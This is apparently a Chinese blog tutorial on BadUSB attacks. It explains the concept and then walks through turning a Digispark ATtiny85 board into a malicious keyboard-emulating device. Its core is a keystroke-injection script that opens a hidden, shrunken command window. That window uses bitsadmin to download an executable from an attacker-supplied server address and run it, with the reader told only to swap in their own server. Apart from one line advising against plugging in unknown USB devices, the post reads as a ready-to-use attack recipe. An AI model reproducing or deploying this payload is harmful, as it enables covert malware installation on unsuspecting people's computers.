BadUSB 介绍

BadUSB攻击是一种利用USB固件中的固有漏洞的攻击,将一个写入了恶意代码的定制USB设备,例如U盘,插入受害者电脑,它会伪装成HID设备(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行操作。它由Karsten Nohl 和 Jakob Lell 在2014年BlackHat大会上提出,特点是恶意代码存在于U盘的固件中,杀毒软件无法访问固件区域,也就没有办法查杀这些恶意代码。应对这一攻击最有效的方法就是不要随意插入未知、不受信任的USB设备。

BadUSB 制作

我用的是Attiny85微型USB接口digispark开发板扩展板
可在淘宝自行购买 这里就不做推荐了

1、装 arduino 的 IDE

首先在下载arduino并安装
链接:https://downloads.arduino.cc/arduino-1.8.19-windows.exe

2、下载驱动

下载驱动
链接:https://i.tianmoy.cn/qt/Digistump.Drivers.zip
注:如果是 64 位操作系统请选择 DPinst64.exe,否则请选择 DPinst.exe

3、配置环境

点击文件--首选项
首选项
开发板管理器网址(国外):http://digistump.com/package_digistump_index.json
开发板管理器网址(国内):https://i.tianmoy.cn/qt/package_digistump_index.json

点击工具--开发板管理器
开发板管理器
等待下载完成,下载失败就用国内的
下载
类型选择贡献
Digistump AVR Boards
安装完成后开发板选择这个
Digistump 16

3、代码部分

远程下载执行代码,更改一下服务器地址就好

DELAY 1000
GUI r
DELAY 1000
STRING cmd ./T:01 /K mode CON: COLS=16 LINES=1
ENTER
DELAY 3000
STRING cmd.exe /c bitsadmin /transfer eH /priority foreground EXE程序下载地址 %USERPROFILE%\Tianmoy.exe && start %USERPROFILE%\Tianmoy.exe
ENTER

注:这些需要在Dckuino.js上面转换
Board
Board选择Digispark然后点击Compile即可

结束

end

最后修改:2022 年 06 月 08 日
如果觉得我的文章对你有用,请随意赞赏